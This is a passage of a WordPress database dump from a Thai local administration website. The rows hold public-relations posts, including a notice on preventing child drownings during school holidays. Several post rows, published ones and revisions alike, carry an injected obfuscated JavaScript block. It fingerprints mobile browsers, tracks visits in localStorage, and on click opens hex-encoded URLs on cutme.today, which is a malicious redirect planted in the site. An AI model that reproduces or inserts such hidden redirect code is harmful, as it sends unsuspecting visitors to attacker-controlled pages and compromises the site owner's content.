)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','405-revision-v1','','','2024-08-01 20:40:04','2024-08-01 13:40:04','',405,'http://pakhaeng.ssk.in.th/?p=407',0,'revision','',0),
(408,1,'2024-08-01 20:41:11','2024-08-01 13:41:11','<!-- wp:paragraph -->\n<p>เฝ้าระวังและป้องกันเด็กจมน้ำในช่วงปิดภาคเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":409,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/13-2567-724x1024.png\" alt=\"\" class=\"wp-image-409\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-25','','','2024-08-01 20:41:12','2024-08-01 13:41:12','',0,'http://pakhaeng.ssk.in.th/?p=408',0,'post','',0),
(409,1,'2024-08-01 20:41:01','2024-08-01 13:41:01','','13-2567','','inherit','','closed','','13-2567','','','2024-08-01 20:41:01','2024-08-01 13:41:01','',408,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/13-2567.png',0,'attachment','image/png',0),
(410,1,'2024-08-01 20:41:11','2024-08-01 13:41:11','<!-- wp:paragraph -->\n<p>เฝ้าระวังและป้องกันเด็กจมน้ำในช่วงปิดภาคเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":409,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/13-2567-724x1024.png\" alt=\"\" class=\"wp-image-409\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 